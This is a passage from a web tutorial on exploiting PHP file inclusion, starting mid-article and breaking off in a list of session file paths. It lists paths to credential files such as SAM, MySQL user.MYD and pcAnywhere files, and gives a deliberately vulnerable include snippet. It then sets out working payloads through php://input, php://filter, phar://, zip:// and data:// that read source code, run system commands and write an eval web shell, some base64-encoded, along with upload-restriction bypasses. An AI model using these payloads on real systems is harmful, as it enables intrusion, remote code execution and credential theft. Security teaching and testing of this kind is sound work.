href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7t8skc4zgmyvz6o0t0ps.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7t8skc4zgmyvz6o0t0ps.png" alt=" " width="800" height="529"></a></p> <h3> Absolute Paths of Sensitive Files </h3> <p>This article provides more detail: <a href="https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o">Summary of Sensitive Directory Paths in Windows and Linux</a></p> <p>Below is a list of absolute paths for commonly used sensitive files:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Windows:</span> c:/boot.ini <span class="c"># View system version</span> c:/windows/php.ini <span class="c"># PHP configuration</span> c:/windows/my.ini <span class="c"># MySQL configuration (may contain credentials)</span> c:/winnt/php.ini c:/winnt/my.ini C:<span class="se">\W</span>indows<span class="se">\w</span><span class="k">in</span>.ini <span class="c"># System configuration file</span> c:<span class="se">\m</span>ysql<span class="se">\d</span>ata<span class="se">\m</span>ysql<span class="se">\u</span>ser.MYD <span class="c"># MySQL user passwords</span> c:<span class="se">\P</span>rogram Files<span class="se">\R</span>hinoSoft.com<span class="se">\S</span>erv-U<span class="se">\S</span>ervUDaemon.ini <span class="c"># Virtual host paths and passwords</span> c:<span class="se">\P</span>rogram Files<span class="se">\S</span>erv-U<span class="se">\S</span>ervUDaemon.ini c:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv<span class="se">\M</span>etaBase.xml <span class="c"># IIS virtual host configuration</span> c:<span class="se">\w</span>indows<span class="se">\r</span>epair<span class="se">\s</span>am <span class="c"># Windows initial installation password</span> c:<span class="se">\P</span>rogram Files<span class="se">\S</span>erv-U<span class="se">\S</span>ervUAdmin.exe <span class="c"># Serv-U admin password (pre-6.0)</span> c:<span class="se">\P</span>rogram Files<span class="se">\R</span>hinoSoft.com<span class="se">\S</span>ervUDaemon.exe C:<span class="se">\D</span>ocuments and Settings<span class="se">\A</span>ll Users<span class="se">\A</span>pplication Data<span class="se">\S</span>ymantec<span class="se">\p</span>cAnywhere<span class="se">\*</span>.cif <span class="c"># pcAnywhere login passwords</span> c:<span class="se">\P</span>rogram Files<span class="se">\A</span>pache Group<span class="se">\A</span>pache<span class="se">\c</span>onf<span class="se">\h</span>ttpd.conf or C:<span class="se">\a</span>pache<span class="se">\c</span>onf<span class="se">\h</span>ttpd.conf <span class="c"># Apache configuration</span> c:/Resin-3.0.14/conf/resin.conf <span class="c"># Resin configuration (JSP)</span> c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf d:<span class="se">\A</span>PACHE<span class="se">\A</span>pache2<span class="se">\c</span>onf<span class="se">\h</span>ttpd.conf C:<span class="se">\P</span>rogram Files<span class="se">\m</span>ysql<span class="se">\m</span>y.ini C:<span class="se">\m</span>ysql<span class="se">\d</span>ata<span class="se">\m</span>ysql<span class="se">\u</span>ser.MYD <span class="c"># MySQL user passwords</span> <span class="c"># Linux/Unix:</span> /usr/local/app/apache2/conf/httpd.conf <span class="c"># Apache2 default configuration</span> /usr/local/apache2/conf/httpd.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf <span class="c"># Virtual host settings</span> /usr/local/app/php5/lib/php.ini <span class="c"># PHP settings</span> /etc/sysconfig/iptables <span class="c"># Firewall rules</span> /etc/httpd/conf/httpd.conf <span class="c"># Apache configuration</span> /etc/rsyncd.conf <span class="c"># rsync configuration</span> /etc/my.cnf <span class="c"># MySQL configuration</span> /etc/redhat-release <span class="c"># System version</span> /etc/issue /etc/issue.net /usr/local/app/php5/lib/php.ini /usr/local/app/apache2/conf/extra/httpd-vhosts.conf /etc/httpd/conf/httpd.conf or /usr/local/apche/conf/httpd.conf /usr/local/resin-3.0.22/conf/resin.conf /usr/local/resin-pro-3.0.22/conf/resin.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf /etc/sysconfig/iptables </code></pre> </div> <h2> Inclusion Techniques </h2> <p>The following examples use this test code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'file'</span><span class="p">];</span> <span class="k">include</span> <span class="nv">$file</span><span class="p">;</span> <span class="cp">?&gt;</span> </code></pre> </div> <p>Default settings: <code>allow_url_fopen = On</code>, <code>allow_url_include = Off</code>. Special requirements are noted where applicable.</p> <h3> PHP Pseudo-Protocols </h3> <p>PHP provides numerous built-in URL-style wrappers that can be used with filesystem functions such as <code>fopen()</code>, <code>copy()</code>, <code>file_exists()</code>, and <code>filesize()</code>. In addition, custom wrappers can be registered via <code>stream_wrapper_register()</code>. PHP pseudo-protocols are supported protocols and wrappers (12 types):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight kotlin"><code><span class="n">file</span><span class="p">:</span><span class="c1">// — Access local filesystem</span> <span class="n">http</span><span class="p">:</span><span class="c1">// — Access HTTP(s) URLs</span> <span class="n">ftp</span><span class="p">:</span><span class="c1">// — Access FTP(s) URLs</span> <span class="n">php</span><span class="p">:</span><span class="c1">// — Access various I/O streams</span> <span class="n">zlib</span><span class="p">:</span><span class="c1">// — Compression streams</span> <span class="n">data</span><span class="p">:</span><span class="c1">// — Data (RFC 2397)</span> <span class="n">glob</span><span class="p">:</span><span class="c1">// — Find matching file path patterns</span> <span class="n">phar</span><span class="p">:</span><span class="c1">// — PHP Archive</span> <span class="n">ssh2</span><span class="p">:</span><span class="c1">// — Secure Shell 2</span> <span class="n">rar</span><span class="p">:</span><span class="c1">// — RAR</span> <span class="n">ogg</span><span class="p">:</span><span class="c1">// — Audio streams</span> <span class="n">expect</span><span class="p">:</span><span class="c1">// — Process interactive streams</span> </code></pre> </div> <h4> file:// </h4> <p>The <code>file://</code> pseudo-protocol accesses local filesystem.</p> <p><strong>Requirements:</strong></p> <ul> <li>No requirement for <code>allow_url_include</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight perl"><code><span class="nv">fileinclude</span><span class="o">.</span><span class="nv">php</span><span class="p">?</span><span class="nv">file</span><span class="o">=</span><span class="nv">file:</span><span class="sr">//</span><span class="nv">C:</span><span class="sr">/Windows/</span><span class="nv">win</span><span class="o">.</span><span class="nv">ini</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ag697e406g6yuuc1ei0.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ag697e406g6yuuc1ei0.png" alt=" " width="800" height="322"></a></p> <h4> php://input </h4> <p>Allows access to the raw request body as a read-only stream. It can read unparsed POST data. Ineffective when <code>enctype="multipart/form-data"</code>.</p> <p><strong>Requirements:</strong></p> <ul> <li> <code>allow_url_include = On</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code>fileinclude.php?file=php://input # POST body: <span class="cp">&lt;?php</span> <span class="nb">phpinfo</span><span class="p">();</span> <span class="cp">?&gt;</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0uhfk9iah8vmqmreppt.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0uhfk9iah8vmqmreppt.png" alt=" " width="800" height="454"></a></p> <h5> Note: Bypassing <code>file_get_contents()</code> with <code>php://input</code> </h5> <p>When encountering <code>file_get_contents()</code>, consider using <code>php://input</code> to bypass restrictions, as PHP pseudo-protocols can also handle HTTP, allowing POST data transfer.</p> <p><code>file_get_contents()</code> returns the entire file content as a string. If a string is passed directly as a parameter, it may cause an error, but if the string contains an HTTP URL, it behaves like <code>curl</code> and reads the source code. PHP pseudo-protocols recognise the HTTP protocol, so <code>php://input</code> can read POST data to assign values to parameters.</p> <p><strong>Test code:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"php://input"</span><span class="p">);</span> <span class="cp">?&gt;</span> </code></pre> </div> <p><strong>Result:</strong></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6giqctq4cl9i7t31iiq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6giqctq4cl9i7t31iiq.png" alt=" " width="799" height="319"></a></p> <h4> php://input (Command Execution) </h4> <p><strong>Requirements:</strong></p> <ul> <li> <code>allow_url_include = On</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code>fileinclude.php?file=php://input # POST body: <span class="cp">&lt;?php</span> <span class="nb">system</span><span class="p">(</span><span class="s1">'whoami'</span><span class="p">);</span> <span class="cp">?&gt;</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5qke8uoppgrjr2qqn6xi.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5qke8uoppgrjr2qqn6xi.png" alt=" " width="799" height="318"></a></p> <h4> php://input (Writing a Trojan) </h4> <p><strong>Requirements:</strong></p> <ul> <li> <code>allow_url_include = On</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code>fileinclude.php?file=php://input # POST body: <span class="nt">&lt;</span><span class="err">?</span><span class="na">php</span> <span class="na">fputs</span><span class="err">(</span><span class="na">fopen</span><span class="err">('</span><span class="na">hack.php</span><span class="err">','</span><span class="na">w</span><span class="err">'),'</span><span class="cp">&lt;?php</span> <span class="o">@</span><span class="k">eval</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="n">v</span><span class="p">])</span><span class="cp">?&gt;</span><span class="err">');?</span><span class="nt">&gt;</span> </code></pre> </div> <p>After execution, the web shell is created in the same directory:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fga3vehsx4zzioic6wq4m.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fga3vehsx4zzioic6wq4m.png" alt=" " width="721" height="324"></a></p> <p>Using a shell management tool (e.g., AntSword), the connection succeeds.</p> <h4> php://filter </h4> <p>A meta-wrapper designed for filtering applications when streams are opened. It reads and writes local disk files.</p> <p><strong>Requirements:</strong></p> <ul> <li>No requirement for <code>allow_url_include</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>fileinclude.php?file<span class="o">=</span>php://filter/read<span class="o">=</span>convert.base64-encode/resource<span class="o">=</span>index.php <span class="c"># Alternative:</span> fileinclude.php?file<span class="o">=</span>php://filter/convert.base64-encode/resource<span class="o">=</span>index.php <span class="c"># (The second is shorter and may bypass some WAFs)</span> </code></pre> </div> <p>By specifying a file at the end, the source code (base64-encoded) can be read and then decoded. Although direct shell access may not be obtained, reading sensitive files is still harmful.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryxszy3lisu5ptc8w9yi.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryxszy3lisu5ptc8w9yi.png" alt=" " width="799" height="318"></a></p> <p>The string <code>PD9waHAKZWNobyAiSGVsbG8gV29ybGQiOwo/Pg==</code> decodes to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="k">echo</span> <span class="s2">"Hello World"</span><span class="p">;</span> <span class="cp">?&gt;</span> </code></pre> </div> <h4> phar:// </h4> <p>This pseudo-protocol extracts archive files. Regardless of the file extension, it is treated as a compressed archive.</p> <p><strong>Requirements:</strong></p> <ul> <li>PHP version &gt;= 5.3.0</li> <li>No requirement for <code>allow_url_include</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong></p> <p>Create a file <code>phpinfo.php</code> with content <code>&lt;?php phpinfo(); ?&gt;</code> and pack it into a ZIP archive:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" alt=" " width="800" height="300"></a></p> <p>Specify the absolute path:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>fileinclude.php?file<span class="o">=</span>phar://D:/phpStudy/PHPTutorial/WWW/test.zip/phpinfo.php </code></pre> </div> <p>Or use a relative path (if <code>test.zip</code> is in the same directory as <code>fileinclude.php</code>):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>fileinclude.php?file<span class="o">=</span>phar://test.zip/phpinfo.php </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft63zlmspnmb3yacl6wol.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft63zlmspnmb3yacl6wol.png" alt=" " width="800" height="118"></a></p> <p><strong>Note:</strong> <code>test.zip</code> must be a ZIP archive; other formats (RAR, 7z) do not work. However, the file extension can be changed to e.g., <code>test.jpg</code> or <code>test.111</code>. This bypasses upload restrictions.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwex09o557fr0uhl5p76c.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwex09o557fr0uhl5p76c.png" alt=" " width="799" height="259"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gj0n4dwt70nizbz5ip.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gj0n4dwt70nizbz5ip.png" alt=" " width="800" height="279"></a></p> <h4> phar:// (Command Execution) </h4> <p>Same as <code>phar://</code>, but with file content changed to <code>&lt;?php system('whoami');?&gt;</code>.</p> <h4> phar:// (Writing a Trojan) </h4> <p><strong>Requirements:</strong></p> <ul> <li>PHP version &gt;= 5.3.0</li> <li>No requirement for <code>allow_url_include</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong></p> <p>Create a web shell <code>shell.php</code> with content <code>&lt;?php @eval($_POST[v]);?&gt;</code> and pack into a ZIP archive:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" alt=" " width="800" height="167"></a></p> <p>Absolute path:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>http://192.168.1.4/fileinclude.php?file<span class="o">=</span>phar://D:/phpStudy/PHPTutorial/WWW/test.zip/shell.php </code></pre> </div> <p>Relative path (if <code>test.zip</code> in current directory):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>http://192.168.1.4/fileinclude.php?file<span class="o">=</span>phar://test.zip/shell.php </code></pre> </div> <p>After visiting the URL, the web shell is written. Then use a shell management tool (e.g., AntSword) to connect.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo7m1eglduxiglksz3xy8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo7m1eglduxiglksz3xy8.png" alt=" " width="800" height="463"></a></p> <p><strong>Note:</strong> The same extension bypass applies: the archive can be renamed.</p> <h4> zip:// </h4> <p>The <code>zip://</code> pseudo-protocol is similar to <code>phar://</code> but used differently.</p> <p><strong>Requirements:</strong></p> <ul> <li>PHP version &gt;= 5.3.0</li> <li>No requirement for <code>allow_url_include</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong></p> <p>Construct a ZIP package similarly:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" alt=" " width="800" height="300"></a></p> <p>With <code>zip://</code>, an absolute path is required. The separator between the archive and the inner file is <code>#</code>, which must be URL-encoded as <code>%23</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight perl"><code><span class="nv">fileinclude</span><span class="o">.</span><span class="nv">php</span><span class="p">?</span><span class="nv">file</span><span class="o">=</span><span class="nv">zip:</span><span class="sr">//</span><span class="nv">D:</span><span class="sr">/phpStudy/</span><span class="nv">PHPTutorial</span><span class="sr">/WWW/</span><span class="nv">test</span><span class="o">.</span><span class="nv">zip</span><span class="o">%</span><span class="mi">23</span><span class="nv">phpinfo</span><span class="o">.</span><span class="nv">php</span> </code></pre> </div> <p>Relative paths cause inclusion failure.</p> <p><strong>Note:</strong> The same extension bypass applies.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhn3bub17kv7zfdowt09f.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhn3bub17kv7zfdowt09f.png" alt=" " width="799" height="241"></a></p> <h4> zip:// (Command Execution) </h4> <p>Same as <code>zip://</code>, with file content changed to <code>&lt;?php system('whoami');?&gt;</code>.</p> <h4> zip:// (Writing a Trojan) </h4> <p><strong>Requirements:</strong></p> <ul> <li>PHP version &gt;= 5.3.0</li> <li>No requirement for <code>allow_url_include</code>.</li> <li>No requirement for <code>allow_url_fopen</code>.</li> </ul> <p><strong>Technique:</strong></p> <p>Create a web shell <code>shell.php</code> with content <code>&lt;?php @eval($_POST[v]);?&gt;</code> and pack into a ZIP archive:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" alt=" " width="800" height="167"></a></p> <p>Absolute path:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight perl"><code><span class="nv">http:</span><span class="sr">//</span><span class="mf">192.168.1.4</span><span class="sr">/fileinclude.php?file=zip://D:/p</span><span class="nv">hpStudy</span><span class="sr">/PHPTutorial/</span><span class="nv">WWW</span><span class="o">/</span><span class="nv">test</span><span class="o">.</span><span class="nv">zip</span><span class="o">%</span><span class="mi">23</span><span class="nv">shell</span><span class="o">.</span><span class="nv">php</span> </code></pre> </div> <p>After visiting the URL, the web shell is written. Relative paths cause failure.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnqkzjbzj1kdfrdqzbyez.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnqkzjbzj1kdfrdqzbyez.png" alt=" " width="800" height="272"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzxs31yjbjaivqa3aqal6.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzxs31yjbjaivqa3aqal6.png" alt=" " width="800" height="540"></a></p> <h4> data:// </h4> <p>A data stream wrapper that redirects the inclusion stream to user-controlled input. In simple terms, it includes the user's input stream.</p> <p><strong>Requirements:</strong></p> <ul> <li>PHP version &gt;= 5.2</li> <li><code>allow_url_fopen = On</code></li> <li><code>allow_url_include = On</code></li> </ul> <p><strong>Technique 1:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code>fileinclude.php?file=data:text/plain,<span class="cp">&lt;?php</span> <span class="nb">phpinfo</span><span class="p">();</span><span class="cp">?&gt;</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdcsqtu9edc5awwyyj7br.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdcsqtu9edc5awwyyj7br.png" alt=" " width="800" height="338"></a></p> <p><strong>Technique 2 (Base64):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>fileinclude.php?file<span class="o">=</span>data:text/plain<span class="p">;</span><span class="nb">base64</span>,PD9waHAgcGhwaW5mbygpOz8%2b </code></pre> </div> <p><code>PD9waHAgcGhwaW5mbygpOz8+</code> decodes to <code>&lt;?php phpinfo();?&gt;</code>. The <code>+</code> must be URL-encoded as <code>%2b</code>; otherwise an error occurs.</p> <h4> data:// (Command Execution) </h4> <p><strong>Technique 1:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code>fileinclude.php?file=data:text/plain,<span class="cp">&lt;?php</span> <span class="nb">system</span><span class="p">(</span><span class="s1">'whoami'</span><span class="p">);</span><span class="cp">?&gt;</span> </code></pre> </div> <p><strong>Technique 2 (Base64):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>fileinclude.php?file<span class="o">=</span>data:text/plain<span class="p">;</span><span class="nb">base64</span>,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg<span class="o">==</span> </code></pre> </div> <p>Decodes to <code>&lt;?php system('whoami');?&gt;</code>.</p> <h4> data:// (Writing a Trojan) </h4> <p><strong>Technique 1:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code>fileinclude.php?file=data:text/plain,<span class="nt">&lt;</span><span class="err">?</span><span class="na">php</span> <span class="na">fputs</span><span class="err">(</span><span class="na">fopen</span><span class="err">('</span><span class="na">hack.php</span><span class="err">','</span><span class="na">w</span><span class="err">'),'</span><span class="cp">&lt;?php</span> <span class="o">@</span><span class="k">eval</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="n">v</span><span class="p">])</span><span class="cp">?&gt;</span><span class="err">');?</span><span class="nt">&gt;</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05ddl5cxl21nwzgdzoqx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05ddl5cxl21nwzgdzoqx.png" alt=" " width="721" height="324"></a></p> <p><strong>Technique 2 (Base64):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>fileinclude.php?file<span class="o">=</span>data:text/plain<span class="p">;</span><span class="nb">base64</span>,PD9waHAgZnB1dHMoZm9wZW4oJ2hhY2sucGhwJywndycpLCc8P3BocCBAZXZhbCgkX1BPU1Rbdl0pPz4nKTs/Pg<span class="o">==</span> </code></pre> </div> <p>Decodes to <code>&lt;?php fputs(fopen('hack.php','w'),'&lt;?php @eval($_POST[v])?&gt;');?&gt;</code>.</p> <h3> Including Session Files </h3> <p><strong>Requirements:</strong> The session file path is known, and the content is partially controllable.</p> <p><strong>Technique:</strong></p> <p>The PHP session file save path can be found in <code>phpinfo</code> under <code>session.save_path</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqy9i9257hxb8feqfsg5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqy9i9257hxb8feqfsg5.png" alt=" " width="800" height="99"></a></p> <p>Common PHP session storage locations:</p> <ol> <li><code>/var/lib/php/sess_PHPSESSID</code></li> <li><code>/var/lib/php/sess_PHPSESSID</code></li> 